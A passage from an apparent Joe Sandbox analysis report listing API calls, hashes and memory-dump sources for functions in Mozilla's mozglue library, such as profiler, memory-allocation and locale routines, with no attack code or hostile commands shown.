                                                                  • Instruction Fuzzy Hash: D371C074909B458BD712CF18C58155BF3F4FF9A314B458A6DE89A9BB01EB30E885CBC1
                                                                  APIs
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C91DDCF
                                                                    • Part of subcall function 6C8FFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8FFA4B
                                                                    • Part of subcall function 6C9190E0: free.MOZGLUE(?,00000000,?,?,6C91DEDB), ref: 6C9190FF
                                                                    • Part of subcall function 6C9190E0: free.MOZGLUE(?,00000000,?,?,6C91DEDB), ref: 6C919108
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C91DE0D
                                                                  • free.MOZGLUE(00000000), ref: 6C91DE41
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C91DE5F
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C91DEA3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C91DEE9
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C90DEFD,?,6C8D4A68), ref: 6C91DF32
                                                                    • Part of subcall function 6C91DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C91DB86
                                                                    • Part of subcall function 6C91DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C91DC0E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C90DEFD,?,6C8D4A68), ref: 6C91DF65
                                                                  • free.MOZGLUE(?), ref: 6C91DF80
                                                                    • Part of subcall function 6C8E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8E5EDB
                                                                    • Part of subcall function 6C8E5E90: memset.VCRUNTIME140(6C927765,000000E5,55CCCCCC), ref: 6C8E5F27
                                                                    • Part of subcall function 6C8E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8E5FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                  • String ID:
                                                                  • API String ID: 112305417-0
                                                                  • Opcode ID: c3e059709452249f5b510c60f9b4a020819ae9000276509eb7347a158af628a6
                                                                  • Instruction ID: 05d47e2b31c01ebc8f68e36cda91ed6961284f43295d3f3d579d0241f900b6e3
                                                                  • Opcode Fuzzy Hash: c3e059709452249f5b510c60f9b4a020819ae9000276509eb7347a158af628a6
                                                                  • Instruction Fuzzy Hash: 8751D8736097099FD7229B18C8816AE7376BFA6309F95052CD81A53F00D731F919CB82
                                                                  APIs
                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C925C8C,?,6C8FE829), ref: 6C925D32
                                                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C925C8C,?,6C8FE829), ref: 6C925D62
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C925C8C,?,6C8FE829), ref: 6C925D6D
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C925C8C,?,6C8FE829), ref: 6C925D84
                                                                  • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C925C8C,?,6C8FE829), ref: 6C925DA4
                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C925C8C,?,6C8FE829), ref: 6C925DC9
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C925DDB
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C925C8C,?,6C8FE829), ref: 6C925E00
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C925C8C,?,6C8FE829), ref: 6C925E45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                  • String ID:
                                                                  • API String ID: 2325513730-0
                                                                  • Opcode ID: f5a02de1343fb89b84c65c88bcf9bfab5db0fc389f332c5c05b8e494ba276ae1
                                                                  • Instruction ID: 9ca5f356575f13075b55ffbba587a55e459c38cfaf1b3eec836e717dd853a92d
                                                                  • Opcode Fuzzy Hash: f5a02de1343fb89b84c65c88bcf9bfab5db0fc389f332c5c05b8e494ba276ae1
                                                                  • Instruction Fuzzy Hash: 0D41A0707042059FCB10EFA9C898AAE77B9EF89318F544068E54A9B795EB34EC05CF61
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C8C31A7), ref: 6C8FCDDD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 4275171209-2186867486
                                                                  • Opcode ID: 002985b67aad4fbf1eb3ef5c9f18e14b243dd5fd5e321c4def855aea1ab21132
                                                                  • Instruction ID: c6ac6b356c76a2a678143f701b0dccd5dd5f3e5171731d6e063c60ce19bc64a4
                                                                  • Opcode Fuzzy Hash: 002985b67aad4fbf1eb3ef5c9f18e14b243dd5fd5e321c4def855aea1ab21132
                                                                  • Instruction Fuzzy Hash: 9831A6317442055BFB34BE65CD45BAE7B75EB81B98F308814F524ABA81DBB0D6018BA1
                                                                  APIs
                                                                    • Part of subcall function 6C8CF100: LoadLibraryW.KERNEL32(shell32,?,6C93D020), ref: 6C8CF122
                                                                    • Part of subcall function 6C8CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C8CF132
                                                                  • moz_xmalloc.MOZGLUE(00000012), ref: 6C8CED50
                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8CEDAC
                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C8CEDCC
                                                                  • CreateFileW.KERNEL32 ref: 6C8CEE08
                                                                  • free.MOZGLUE(00000000), ref: 6C8CEE27
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C8CEE32
                                                                    • Part of subcall function 6C8CEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C8CEBB5
                                                                    • Part of subcall function 6C8CEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C8FD7F3), ref: 6C8CEBC3
                                                                    • Part of subcall function 6C8CEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C8FD7F3), ref: 6C8CEBD6
                                                                  Strings
                                                                  • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C8CEDC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                  • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                  • API String ID: 1980384892-344433685
                                                                  • Opcode ID: 98b69dd715496e4991a776fe9911ce1f11235e847d4e221ceff616d0cdf81926
                                                                  • Instruction ID: caecf8ac3423adb394ab1ed91b1893327db167f5623903fcd9e4ef4ba80b194f
                                                                  • Opcode Fuzzy Hash: 98b69dd715496e4991a776fe9911ce1f11235e847d4e221ceff616d0cdf81926
                                                                  • Instruction Fuzzy Hash: D351C371E053188BDB20DF68CA426EEB7B1AF59358F448D2DE8556B740E730E948C7A3
                                                                  APIs
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C93A565
                                                                    • Part of subcall function 6C93A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C93A4BE
                                                                    • Part of subcall function 6C93A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C93A4D6
                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C93A65B
                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C93A6B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                  • String ID: 0$z
                                                                  • API String ID: 310210123-2584888582
                                                                  • Opcode ID: 9215aca01f91d001a247163ab2c8e20c1e6bba538c8f029b2fded6f77a7a9090
                                                                  • Instruction ID: 22d63bd773673f042c06db276ca22d8b551e1519d7dbf1317790fc27ce48f087
                                                                  • Opcode Fuzzy Hash: 9215aca01f91d001a247163ab2c8e20c1e6bba538c8f029b2fded6f77a7a9090
                                                                  • Instruction Fuzzy Hash: 48414771A087459FC741DF68C080A9FBBE5BF89358F409A2EF49987650EB30D549CB92
                                                                  APIs
                                                                  • free.MOZGLUE(?,6C94008B), ref: 6C8C7B89
                                                                  • free.MOZGLUE(?,6C94008B), ref: 6C8C7BAC
                                                                    • Part of subcall function 6C8C78C0: free.MOZGLUE(?,6C94008B), ref: 6C8C7BCF
                                                                  • free.MOZGLUE(?,6C94008B), ref: 6C8C7BF2
                                                                    • Part of subcall function 6C8E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8E5EDB
                                                                    • Part of subcall function 6C8E5E90: memset.VCRUNTIME140(6C927765,000000E5,55CCCCCC), ref: 6C8E5F27
                                                                    • Part of subcall function 6C8E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8E5FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSection$EnterLeavememset
                                                                  • String ID:
                                                                  • API String ID: 3977402767-0
                                                                  • Opcode ID: efd034ec511e33d566f1f9725980f90f81af4fe80d51a1e918b1a2646efdd96d
                                                                  • Instruction ID: 6fdd66e6e16f90c3185f1cca3da470c6349d71bfecb775a30e7abfac3fd4dd8d
                                                                  • Opcode Fuzzy Hash: efd034ec511e33d566f1f9725980f90f81af4fe80d51a1e918b1a2646efdd96d
                                                                  • Instruction Fuzzy Hash: BEC1B431F011298BEB348B28CE90B9DB772AF41318F154BE9D51AA7BC0C731DE858B52
                                                                  APIs
                                                                    • Part of subcall function 6C8FAB89: EnterCriticalSection.KERNEL32(6C94E370,?,?,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB94
                                                                    • Part of subcall function 6C8FAB89: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FABD1
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                  • __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  Strings
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C90946B
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C90947D
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C909459
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                  • API String ID: 4042361484-1628757462
                                                                  • Opcode ID: 884b70f764abf98ffac4bd9f2b57594a8b3ce8fb05a13468448f2709f74c054d
                                                                  • Instruction ID: aa88bcd519afa5f9b15a6c377bce0eb4a18e02b0b7ba0100f85d3ef60b571178
                                                                  • Opcode Fuzzy Hash: 884b70f764abf98ffac4bd9f2b57594a8b3ce8fb05a13468448f2709f74c054d
                                                                  • Instruction Fuzzy Hash: A7014C30B041028BDF10EB5CD814A8633B99B4637DF26C53BED0686B41EB31D4658957
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C910F6B
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C910F88
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C910FF7
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C911067
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C9110A7
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C91114B
                                                                    • Part of subcall function 6C908AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C921563), ref: 6C908BD5
                                                                  • free.MOZGLUE(?), ref: 6C911174
                                                                  • free.MOZGLUE(?), ref: 6C911186
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                  • String ID:
                                                                  • API String ID: 2803333873-0
                                                                  • Opcode ID: 70b200bb3edd04ea75271766579ab977dad75b3684bee69329ced3b58291f5c7
                                                                  • Instruction ID: c703e1ed444f39f4fbf1488c9dc85697a15871c429b82b4920cc8094a6cdeb07
                                                                  • Opcode Fuzzy Hash: 70b200bb3edd04ea75271766579ab977dad75b3684bee69329ced3b58291f5c7
                                                                  • Instruction Fuzzy Hash: 11612571A083489FCB10DF24C98179AB7F5BFE6318F14891DE88947B11EB31E559CB81
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,6C8CB61E,?,?,?,?,?,00000000), ref: 6C8CB6AC
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C8CB61E,?,?,?,?,?,00000000), ref: 6C8CB6D1
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C8CB61E,?,?,?,?,?,00000000), ref: 6C8CB6E3
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C8CB61E,?,?,?,?,?,00000000), ref: 6C8CB70B
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C8CB61E,?,?,?,?,?,00000000), ref: 6C8CB71D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C8CB61E), ref: 6C8CB73F
                                                                  • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C8CB61E,?,?,?,?,?,00000000), ref: 6C8CB760
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C8CB61E,?,?,?,?,?,00000000), ref: 6C8CB79A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                  • String ID:
                                                                  • API String ID: 1394714614-0
                                                                  • Opcode ID: 3de9d8961bfa3b14b609632bdaca5868bac27a270bdef2988cdfab71f9ce315a
                                                                  • Instruction ID: 9d0e7f7e02189302b56896c95e30ae4b0718a2ad7a87592acac156b7591b5e06
                                                                  • Opcode Fuzzy Hash: 3de9d8961bfa3b14b609632bdaca5868bac27a270bdef2988cdfab71f9ce315a
                                                                  • Instruction Fuzzy Hash: BB4104B2E005199FCB10DF68DD805BFB7B5BF55320B250A29E825E7780D731E9148BD2
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(6C945104), ref: 6C8CEFAC
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C8CEFD7
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8CEFEC
                                                                  • free.MOZGLUE(?), ref: 6C8CF00C
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C8CF02E
                                                                  • memcpy.VCRUNTIME140(00000000,?), ref: 6C8CF041
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF065
                                                                  • moz_xmalloc.MOZGLUE ref: 6C8CF072
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 1148890222-0
                                                                  • Opcode ID: c981b4de710e639ab5b482b8b871e500c511333d0e9101872f1798b0c8b796e7
                                                                  • Instruction ID: ae12bd4c43a5730b910b9f0007b4919fce4a72580b847b9f2d0aa1c20dab8b09
                                                                  • Opcode Fuzzy Hash: c981b4de710e639ab5b482b8b871e500c511333d0e9101872f1798b0c8b796e7
                                                                  • Instruction Fuzzy Hash: 684126B1B002159FDB18CF68D9819AF73A5BFA4324B24063CE815CB794EB31E905C7E2
                                                                  APIs
                                                                  • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C93B5B9
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C93B5C5
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C93B5DA
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C93B5F4
                                                                  • __Init_thread_footer.LIBCMT ref: 6C93B605
                                                                  • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C93B61F
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C93B631
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C93B655
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                  • String ID:
                                                                  • API String ID: 1276798925-0
                                                                  • Opcode ID: b84b33a4400c37f3a458bca7a8ad5c1430cec0cdffb8c7e823d883cf5bae881c
                                                                  • Instruction ID: 71f34183bcc3f1fc85748fdffab481fc6a47d2d62ae9ac5dbed404552a2289c2
                                                                  • Opcode Fuzzy Hash: b84b33a4400c37f3a458bca7a8ad5c1430cec0cdffb8c7e823d883cf5bae881c
                                                                  • Instruction Fuzzy Hash: 0131B371B04615CBCB10EFA8C8589AEB7B5FF8A32DF244569D91697740DB30E806CB91
                                                                  APIs
                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C91CC83,?,?,?,?,?,?,?,?,?,6C91BCAE,?,?,6C90DC2C), ref: 6C8DB7E6
                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C91CC83,?,?,?,?,?,?,?,?,?,6C91BCAE,?,?,6C90DC2C), ref: 6C8DB80C
                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C91CC83,?,?,?,?,?,?,?,?,?,6C91BCAE), ref: 6C8DB88E
                                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C91CC83,?,?,?,?,?,?,?,?,?,6C91BCAE,?,?,6C90DC2C), ref: 6C8DB896
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                  • String ID:
                                                                  • API String ID: 922945588-0
                                                                  • Opcode ID: 362936922295768741ef693aa068b901b99407dbe7cf74ab175365ed95738b71
